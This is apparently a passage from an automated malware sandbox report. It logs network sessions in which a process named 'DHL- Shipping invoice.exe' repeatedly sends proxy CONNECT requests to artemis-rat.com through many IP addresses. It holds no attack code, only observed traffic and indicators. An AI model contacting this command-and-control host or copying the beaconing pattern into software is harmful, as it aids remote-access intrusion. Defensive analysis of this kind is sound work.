6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            959192.168.2.452955190.186.18.1619996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.861793995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.562309027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.250176907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.562962055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.343384981 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            960192.168.2.45286738.10.90.6806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.875607967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            961192.168.2.45079337.187.91.192117216484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.877890110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953022957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.047005892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            962192.168.2.452460181.129.62.2398436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.879647970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            963192.168.2.451018142.54.226.21441456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.890902042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            964192.168.2.452876171.244.140.160316436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.897372007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.640656948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.750261068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.008999109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            965192.168.2.452424146.190.57.16931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.907089949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953200102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.318784952 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            966192.168.2.453015185.101.16.52806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.907177925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            967192.168.2.45302351.89.173.40238546484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.913542986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.359389067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.062606096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.250181913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453334093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.563131094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.765785933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.859707117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.062546968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            968192.168.2.45303137.187.77.58107106484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.921072006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.452935934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.047008038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            969192.168.2.45304637.187.91.192176056484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.924211025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.452938080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.046916962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            970192.168.2.453025185.162.60.680806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.930464983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            971192.168.2.45293039.105.27.3031286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.930655956 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:03.230041027 CET38INHTTP/1.1 200 OK
                            content-length: 0
                            Mar 12, 2024 08:37:04.041177988 CET38INHTTP/1.1 200 OK
                            content-length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            972192.168.2.45091182.165.208.12631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.932128906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.234800100 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            973192.168.2.45303884.39.112.14431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.932334900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            974192.168.2.450715148.72.210.123202686484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.932543039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953252077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.062728882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.063091040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.062674999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:39.067831039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            975192.168.2.45304375.119.145.169380236484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.933412075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.453100920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.047008038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.197563887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.250709057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.343985081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.453309059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.640827894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:23.843831062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            976192.168.2.453085104.21.85.200806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.940040112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.027240038 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            977192.168.2.452828150.107.136.11080826484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.943686008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            978192.168.2.453094104.20.123.164806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.944916964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.032098055 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            979192.168.2.453084135.148.10.161316966484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.947568893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.343564987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.750005960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.453214884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.741266966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.009064913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.343847990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.950359106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            980192.168.2.452848103.200.20.5631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.947793961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.749972105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.047159910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
